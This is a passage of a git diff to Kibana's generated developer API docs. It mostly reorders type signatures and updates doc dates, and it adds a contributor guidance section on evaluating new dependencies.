b/api_docs/triggers_actions_ui.devdocs.json index b14da2c49a52e..e8db880ec5e91 100644 --- a/api_docs/triggers_actions_ui.devdocs.json +++ b/api_docs/triggers_actions_ui.devdocs.json @@ -1508,7 +1508,7 @@ "label": "suspendedComponentWithProps", "description": [], "signature": [ - "(ComponentToSuspend: React.ComponentType, size: \"s\" | \"m\" | \"l\" | \"xl\" | \"xxl\" | undefined) => (props: T) => JSX.Element" + "(ComponentToSuspend: React.ComponentType, size: \"m\" | \"s\" | \"l\" | \"xl\" | \"xxl\" | undefined) => (props: T) => JSX.Element" ], "path": "x-pack/plugins/triggers_actions_ui/public/application/lib/suspended_component_with_props.tsx", "deprecated": false, @@ -1535,7 +1535,7 @@ "label": "size", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | \"xl\" | \"xxl\" | undefined" + "\"m\" | \"s\" | \"l\" | \"xl\" | \"xxl\" | undefined" ], "path": "x-pack/plugins/triggers_actions_ui/public/application/lib/suspended_component_with_props.tsx", "deprecated": false, @@ -2071,7 +2071,7 @@ "label": "flyoutSize", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | undefined" + "\"m\" | \"s\" | \"l\" | undefined" ], "path": "x-pack/plugins/triggers_actions_ui/public/types.ts", "deprecated": false @@ -2841,7 +2841,7 @@ "label": "ruleTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -2857,7 +2857,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -2873,7 +2873,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -2902,11 +2902,11 @@ "label": "actionTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -3596,7 +3596,7 @@ "label": "setRuleProperty", "description": [], "signature": [ - "(key: Prop, value: ", + "(key: Prop, value: ", "SanitizedRule", "[Prop] | null) => void" ], @@ -4012,11 +4012,11 @@ "label": "actionTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -4031,7 +4031,7 @@ "label": "ruleTypeRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4047,7 +4047,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4063,7 +4063,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4092,11 +4092,11 @@ "label": "alertsTableConfigurationRegistry", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "AlertsTableConfigurationRegistry", - "[]; get: (id: string) => ", + "; list: () => ", "AlertsTableConfigurationRegistry", - "; register: (objectType: ", + "[]; register: (objectType: ", "AlertsTableConfigurationRegistry", ") => void; has: (id: string) => boolean; }" ], @@ -4303,11 +4303,11 @@ "label": "ActionTypeRegistryContract", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "ActionTypeModel", - "[]; get: (id: string) => ", + "; list: () => ", "ActionTypeModel", - "; register: (objectType: ", + "[]; register: (objectType: ", "ActionTypeModel", ") => void; has: (id: string) => boolean; }" ], @@ -4337,11 +4337,11 @@ "label": "AlertsTableConfigurationRegistryContract", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", "AlertsTableConfigurationRegistry", - "[]; get: (id: string) => ", + "; list: () => ", "AlertsTableConfigurationRegistry", - "; register: (objectType: ", + "[]; register: (objectType: ", "AlertsTableConfigurationRegistry", ") => void; has: (id: string) => boolean; }" ], @@ -4515,7 +4515,7 @@ "label": "RuleTypeRegistryContract", "description": [], "signature": [ - "{ list: () => ", + "{ get: (id: string) => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4531,7 +4531,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">[]; get: (id: string) => ", + ">; list: () => ", { "pluginId": "triggersActionsUi", "scope": "public", @@ -4547,7 +4547,7 @@ "section": "def-common.RuleTypeParams", "text": "RuleTypeParams" }, - ">; register: (objectType: ", + ">[]; register: (objectType: ", { "pluginId": "triggersActionsUi", "scope": "public", diff --git a/api_docs/triggers_actions_ui.mdx b/api_docs/triggers_actions_ui.mdx index 9cb56a3b99d67..e764ea455f9e5 100644 --- a/api_docs/triggers_actions_ui.mdx +++ b/api_docs/triggers_actions_ui.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/triggersActionsUi title: "triggersActionsUi" image: https://source.unsplash.com/400x175/?github description: API docs for the triggersActionsUi plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'triggersActionsUi'] --- import triggersActionsUiObj from './triggers_actions_ui.devdocs.json'; diff --git a/api_docs/ui_actions.mdx b/api_docs/ui_actions.mdx index 41755cca634c2..93584be5eb047 100644 --- a/api_docs/ui_actions.mdx +++ b/api_docs/ui_actions.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/uiActions title: "uiActions" image: https://source.unsplash.com/400x175/?github description: API docs for the uiActions plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'uiActions'] --- import uiActionsObj from './ui_actions.devdocs.json'; diff --git a/api_docs/ui_actions_enhanced.mdx b/api_docs/ui_actions_enhanced.mdx index 3bd5fcc3d1103..fe876a3c404e5 100644 --- a/api_docs/ui_actions_enhanced.mdx +++ b/api_docs/ui_actions_enhanced.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/uiActionsEnhanced title: "uiActionsEnhanced" image: https://source.unsplash.com/400x175/?github description: API docs for the uiActionsEnhanced plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'uiActionsEnhanced'] --- import uiActionsEnhancedObj from './ui_actions_enhanced.devdocs.json'; diff --git a/api_docs/unified_search.devdocs.json b/api_docs/unified_search.devdocs.json index 756a40fd1398a..2e8d4636df681 100644 --- a/api_docs/unified_search.devdocs.json +++ b/api_docs/unified_search.devdocs.json @@ -285,9 +285,9 @@ "label": "props", "description": [], "signature": [ - "{ dataTestSubj?: string | undefined; query?: ", + "{ query?: ", "Query", - " | QT | undefined; filters?: ", + " | QT | undefined; dataTestSubj?: string | undefined; filters?: ", "Filter", "[] | undefined; savedQuery?: ", { @@ -407,12 +407,35 @@ { "parentPluginId": "unifiedSearch", "id": "def-public.ApplyGlobalFilterActionContext.embeddable", - "type": "Unknown", + "type": "Object", "tags": [], "label": "embeddable", "description": [], "signature": [ - "unknown" + { + "pluginId": "embeddable", + "scope": "public", + "docId": "kibEmbeddablePluginApi", + "section": "def-public.IEmbeddable", + "text": "IEmbeddable" + }, + "<", + { + "pluginId": "embeddable", + "scope": "common", + "docId": "kibEmbeddablePluginApi", + "section": "def-common.EmbeddableInput", + "text": "EmbeddableInput" + }, + ", ", + { + "pluginId": "embeddable", + "scope": "public", + "docId": "kibEmbeddablePluginApi", + "section": "def-public.EmbeddableOutput", + "text": "EmbeddableOutput" + }, + "> | undefined" ], "path": "src/plugins/unified_search/public/actions/apply_filter_action.ts", "deprecated": false @@ -1215,9 +1238,9 @@ "Omit", ", \"onChange\" | \"selectedOptions\" | \"options\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\"> & Required, \"options\" | \"onChange\" | \"selectedOptions\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\"> & Required, \"onChange\" | \"selectedOptions\" | \"options\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\">> & { onChange: (indexPatternId?: string | undefined) => void; indexPatternId: string; onNoIndexPatterns?: (() => void) | undefined; }" + ", \"options\" | \"onChange\" | \"selectedOptions\" | \"isLoading\" | \"onSearchChange\">, \"placeholder\">> & { onChange: (indexPatternId?: string | undefined) => void; indexPatternId: string; onNoIndexPatterns?: (() => void) | undefined; }" ], "path": "src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx", "deprecated": false, diff --git a/api_docs/unified_search.mdx b/api_docs/unified_search.mdx index 6eee52755d158..f18746f866ef7 100644 --- a/api_docs/unified_search.mdx +++ b/api_docs/unified_search.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/unifiedSearch title: "unifiedSearch" image: https://source.unsplash.com/400x175/?github description: API docs for the unifiedSearch plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'unifiedSearch'] --- import unifiedSearchObj from './unified_search.devdocs.json'; diff --git a/api_docs/unified_search_autocomplete.mdx b/api_docs/unified_search_autocomplete.mdx index c11101a1ca429..41e29f54eab13 100644 --- a/api_docs/unified_search_autocomplete.mdx +++ b/api_docs/unified_search_autocomplete.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/unifiedSearch-autocomplete title: "unifiedSearch.autocomplete" image: https://source.unsplash.com/400x175/?github description: API docs for the unifiedSearch.autocomplete plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'unifiedSearch.autocomplete'] --- import unifiedSearchAutocompleteObj from './unified_search_autocomplete.devdocs.json'; diff --git a/api_docs/url_forwarding.mdx b/api_docs/url_forwarding.mdx index e4081f5bdef08..ff5859fc1135c 100644 --- a/api_docs/url_forwarding.mdx +++ b/api_docs/url_forwarding.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/urlForwarding title: "urlForwarding" image: https://source.unsplash.com/400x175/?github description: API docs for the urlForwarding plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'urlForwarding'] --- import urlForwardingObj from './url_forwarding.devdocs.json'; diff --git a/api_docs/usage_collection.devdocs.json b/api_docs/usage_collection.devdocs.json index af132ce09f96c..fc4e370e41c2f 100644 --- a/api_docs/usage_collection.devdocs.json +++ b/api_docs/usage_collection.devdocs.json @@ -326,7 +326,61 @@ "\nRequest-scoped Elasticsearch client" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", @@ -394,7 +444,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -420,33 +470,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", @@ -472,33 +496,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -1458,6 +1456,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", @@ -1866,7 +1866,7 @@ "\nPossible type values in the schema" ], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" + "\"boolean\" | \"date\" | \"keyword\" | \"text\" | \"long\" | \"double\" | \"short\" | \"float\" | \"integer\" | \"byte\"" ], "path": "node_modules/@types/kbn__analytics-client/index.d.ts", "deprecated": false, diff --git a/api_docs/usage_collection.mdx b/api_docs/usage_collection.mdx index 3f814b7b5f81a..1c296f04cec00 100644 --- a/api_docs/usage_collection.mdx +++ b/api_docs/usage_collection.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/usageCollection title: "usageCollection" image: https://source.unsplash.com/400x175/?github description: API docs for the usageCollection plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'usageCollection'] --- import usageCollectionObj from './usage_collection.devdocs.json'; diff --git a/api_docs/ux.mdx b/api_docs/ux.mdx index 1c8009686265d..1010db8d591a1 100644 --- a/api_docs/ux.mdx +++ b/api_docs/ux.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/ux title: "ux" image: https://source.unsplash.com/400x175/?github description: API docs for the ux plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'ux'] --- import uxObj from './ux.devdocs.json'; diff --git a/api_docs/vis_default_editor.devdocs.json b/api_docs/vis_default_editor.devdocs.json index cf5112446cd85..f12ad0fd98f63 100644 --- a/api_docs/vis_default_editor.devdocs.json +++ b/api_docs/vis_default_editor.devdocs.json @@ -310,7 +310,7 @@ "section": "def-public.DefaultEditorSize", "text": "DefaultEditorSize" }, - ") => 50 | 15 | 30" + ") => 15 | 50 | 30" ], "path": "src/plugins/vis_default_editor/public/editor_size.ts", "deprecated": false, diff --git a/api_docs/vis_default_editor.mdx b/api_docs/vis_default_editor.mdx index 273f8f5f1ed58..814d30ce38dac 100644 --- a/api_docs/vis_default_editor.mdx +++ b/api_docs/vis_default_editor.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visDefaultEditor title: "visDefaultEditor" image: https://source.unsplash.com/400x175/?github description: API docs for the visDefaultEditor plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visDefaultEditor'] --- import visDefaultEditorObj from './vis_default_editor.devdocs.json'; diff --git a/api_docs/vis_type_gauge.mdx b/api_docs/vis_type_gauge.mdx index a8ac2c8a41937..da5640fd3cfe4 100644 --- a/api_docs/vis_type_gauge.mdx +++ b/api_docs/vis_type_gauge.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeGauge title: "visTypeGauge" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeGauge plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeGauge'] --- import visTypeGaugeObj from './vis_type_gauge.devdocs.json'; diff --git a/api_docs/vis_type_heatmap.mdx b/api_docs/vis_type_heatmap.mdx index 5a6fc2649b02c..8ebe21443b746 100644 --- a/api_docs/vis_type_heatmap.mdx +++ b/api_docs/vis_type_heatmap.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeHeatmap title: "visTypeHeatmap" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeHeatmap plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeHeatmap'] --- import visTypeHeatmapObj from './vis_type_heatmap.devdocs.json'; diff --git a/api_docs/vis_type_pie.mdx b/api_docs/vis_type_pie.mdx index 42921f7913569..5da7c25387f85 100644 --- a/api_docs/vis_type_pie.mdx +++ b/api_docs/vis_type_pie.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypePie title: "visTypePie" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypePie plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypePie'] --- import visTypePieObj from './vis_type_pie.devdocs.json'; diff --git a/api_docs/vis_type_table.mdx b/api_docs/vis_type_table.mdx index 5c9e13373294d..02bb33a478f7b 100644 --- a/api_docs/vis_type_table.mdx +++ b/api_docs/vis_type_table.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeTable title: "visTypeTable" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeTable plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeTable'] --- import visTypeTableObj from './vis_type_table.devdocs.json'; diff --git a/api_docs/vis_type_timelion.mdx b/api_docs/vis_type_timelion.mdx index 0bb4f32b5070c..1d0ef14ec8dff 100644 --- a/api_docs/vis_type_timelion.mdx +++ b/api_docs/vis_type_timelion.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeTimelion title: "visTypeTimelion" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeTimelion plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeTimelion'] --- import visTypeTimelionObj from './vis_type_timelion.devdocs.json'; diff --git a/api_docs/vis_type_timeseries.mdx b/api_docs/vis_type_timeseries.mdx index 47f7ea437c03d..9b685fc5c1bbf 100644 --- a/api_docs/vis_type_timeseries.mdx +++ b/api_docs/vis_type_timeseries.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeTimeseries title: "visTypeTimeseries" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeTimeseries plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeTimeseries'] --- import visTypeTimeseriesObj from './vis_type_timeseries.devdocs.json'; diff --git a/api_docs/vis_type_vega.mdx b/api_docs/vis_type_vega.mdx index 094c06b226c73..af1ced42d7181 100644 --- a/api_docs/vis_type_vega.mdx +++ b/api_docs/vis_type_vega.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeVega title: "visTypeVega" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeVega plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeVega'] --- import visTypeVegaObj from './vis_type_vega.devdocs.json'; diff --git a/api_docs/vis_type_vislib.mdx b/api_docs/vis_type_vislib.mdx index b77b1cc71309a..3e2adba34760a 100644 --- a/api_docs/vis_type_vislib.mdx +++ b/api_docs/vis_type_vislib.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeVislib title: "visTypeVislib" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeVislib plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeVislib'] --- import visTypeVislibObj from './vis_type_vislib.devdocs.json'; diff --git a/api_docs/vis_type_xy.mdx b/api_docs/vis_type_xy.mdx index 03381a6cd1c6a..c1f5c4d6e90ac 100644 --- a/api_docs/vis_type_xy.mdx +++ b/api_docs/vis_type_xy.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeXy title: "visTypeXy" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeXy plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeXy'] --- import visTypeXyObj from './vis_type_xy.devdocs.json'; diff --git a/api_docs/visualizations.devdocs.json b/api_docs/visualizations.devdocs.json index 5931d92077178..5422e836c2845 100644 --- a/api_docs/visualizations.devdocs.json +++ b/api_docs/visualizations.devdocs.json @@ -3084,7 +3084,7 @@ "label": "getDisplayName", "description": [], "signature": [ - "(() => string) | undefined" + "() => string" ], "path": "src/plugins/visualizations/public/types.ts", "deprecated": false, @@ -5125,7 +5125,7 @@ "label": "VisualizeEmbeddableContract", "description": [], "signature": [ - "{ readonly type: \"visualization\"; readonly id: string; render: (domNode: HTMLElement) => Promise; getExplicitInput: () => ", + "{ readonly type: \"visualization\"; render: (domNode: HTMLElement) => Promise; readonly id: string; getExplicitInput: () => ", { "pluginId": "visualizations", "scope": "public", @@ -5505,7 +5505,7 @@ "section": "def-public.OnSaveProps", "text": "OnSaveProps" }, - ") => Promise; }" + ") => Promise; }" ], "path": "src/plugins/visualizations/public/index.ts", "deprecated": false, diff --git a/api_docs/visualizations.mdx b/api_docs/visualizations.mdx index 97311a13db262..ae8173bcceb6c 100644 --- a/api_docs/visualizations.mdx +++ b/api_docs/visualizations.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visualizations title: "visualizations" image: https://source.unsplash.com/400x175/?github description: API docs for the visualizations plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visualizations'] --- import visualizationsObj from './visualizations.devdocs.json'; diff --git a/dev_docs/api_welcome.mdx b/dev_docs/api_welcome.mdx index 1127ecc8603b6..43fac7407989d 100644 --- a/dev_docs/api_welcome.mdx +++ b/dev_docs/api_welcome.mdx @@ -12,7 +12,7 @@ documentation for every plugin that exposes a This documentation is being automatically generated using an - [_experimental_ system](https://github.com/elastic/kibana/blob/main/rfcs/text/0014_api_documentation.md). That means + [_experimental_ system](https://github.com/elastic/kibana/blob/main/legacy_rfcs/text/0014_api_documentation.md). That means it may be removed or modified at any time. If you have any questions, feedback or concerns, please create an issue using the label `APIDocs`, or reach out to the Kibana Tech Leads who are temporarily owning and maintaining this system. diff --git a/dev_docs/contributing/standards.mdx b/dev_docs/contributing/standards.mdx index 1bb54ada1509c..aba29e5fab2f2 100644 --- a/dev_docs/contributing/standards.mdx +++ b/dev_docs/contributing/standards.mdx @@ -15,6 +15,49 @@ We expect all developers to read and abide by our overarching . The majority of these items are linted against but some are not. +## Adding dependencies + +Looking for a dependency that isn't already available in Kibana? There are a few things to keep in mind before adding a new dependency. + +First, be sure you have read and are familiar with our . In particular, **Be wary of dependencies** +and **Prefer one way to do things** provide an overview of how we approach this question. + +In general, we have a bias toward **not** adding new dependencies unless there is a compelling reason to do so, as we want to +minimize Kibana's overall complexity. + +Should you find yourself evaluating a new dependency, here are some specific things to ask yourself: + +1. **Is there already another dependency that offers similar functionality?** If so, adding a new dependency may not be necessary. +Prefer one way to do things and use what's already there, unless there is an important reason not to do so. +2. **Does this dependency appear to be well-maintained?** A dependency that hasn't been updated in years is usually more of a +liability than an asset. Make sure the depedency has recent activity, that bugs and security vulnerabilities appear to be addressed +in a timely manner, and that there is active participation from the maintainers and community. +3. **How large is the dependency?** For client-side plugins, heavy dependencies can have a real impact on user experience, +especially if they are included in the initial page bundle and not loaded asynchronously. In some cases it might make more sense +to roll your own rather than include a bloated depedency, especially if you are only using a single piece of functionality. +4. **Does this dependency have a license that's compatible with Kibana's?** Most common open source licenses such as BSD, MIT, +and Apache 2.0/1.1 are okay to use with Kibana. Others may not be, or may require special attribution. +5. **Will this dependency need to be prebuilt?** Due to our build process, native module dependencies should include at least a prebuild +step so at install time it simply downloads instead of building from source. This allows us to optimize bootstrap times. +6. **Am I committed to maintaining this dependency?** Once you add a dependency to the `package.json`, someone else isn't going to +keep it updated for you. That means you will be responsible for updating it regularly, keeping an eye out for security vulnerabilities, +and dealing with any breaking changes that may arise during an upgrade. We recommend relying on the renovate bot to help keep the +dependency updated; be sure to mark your ownership of the package in the +[`renovate.json`](https://github.com/elastic/kibana/blob/main/renovate.json`) file. + +If you have any questions about whether adding a dependency is appropriate, feel free to reach out to one of the following teams +on Github: + +- **@elastic/kibana-tech-leads** +- **@elastic/kibana-core** +- **@elastic/kibana-operations** +- **@elastic/kibana-security** + + + If you are unsure of which licenses are okay to use, refer to the + [Permitted Open Source Licenses list](https://github.com/elastic/open-source/blob/main/elastic-product-policy.md#permitted-licenses-list). + + ## RESTful HTTP APIs ### Terminology diff --git a/dev_docs/key_concepts/embeddables.mdx b/dev_docs/key_concepts/embeddables.mdx index f1a2bea5b9b12..e42233a7f3f26 100644 --- a/dev_docs/key_concepts/embeddables.mdx +++ b/dev_docs/key_concepts/embeddables.mdx @@ -14,6 +14,7 @@ If you are planning to integrate with the plugin, please get in touch with the A ## Capabilities - Framework-agnostic API. - Out-of-the-box React support. +- Integration with Redux. - Integration with the [UI Actions](https://github.com/elastic/kibana/tree/HEAD/src/plugins/ui_actions) plugin. - Hierarchical structure to enclose multiple widgets. - Error handling. diff --git a/dev_docs/operations/operations_landing.mdx b/dev_docs/operations/operations_landing.mdx index 2b1a6e773d39f..49325b5babb57 100644 --- a/dev_docs/operations/operations_landing.mdx +++ b/dev_docs/operations/operations_landing.mdx @@ -73,5 +73,6 @@ layout: landing { pageId: "kibDevDocsOpsKibanaManifestSchema" }, { pageId: "kibDevDocsOpsManagedVscodeConfig" }, { pageId: "kibDevDocsOpsManagedVscodeConfigCli" }, + { pageId: "kibDevDocsOpsTest" }, ]} /> \ No newline at end of file diff --git a/dev_docs/operations/packages_idm.mdx b/dev_docs/operations/packages_idm.mdx index 62fe1a76c69f2..082af6605b092 100644 --- a/dev_docs/operations/packages_idm.mdx +++ b/dev_docs/operations/packages_idm.mdx @@ -11,13 +11,13 @@ tags: ['kibana', 'dev', 'contributor', 'operations', 'idm', 'packages'] The size of the Kibana repository has surpassed almost all other Typescript projects on Github, and the Javascript tooling ecosystem is inadequate. AppEx Operations team has done a lot of work over the years to close these gaps and keep up with our codebase's growth. Still, significant steps are necessary to provide a more efficient development experience. The AppEx Operations team is leading an effort to migrate to Bazel, which among other things, will provide remote caching and incremental builds. This initiative should drastically improve the productivity of Kibana contributors by minimizing what needs to be built, both locally and in CI, and providing faster and more thorough feedback. - This document represents the target of the IDM project and not the currently implemented features. See [What works now?][status] for information about current implementation status. + This document represents the target of the IDM project and not the currently implemented features. See [What works 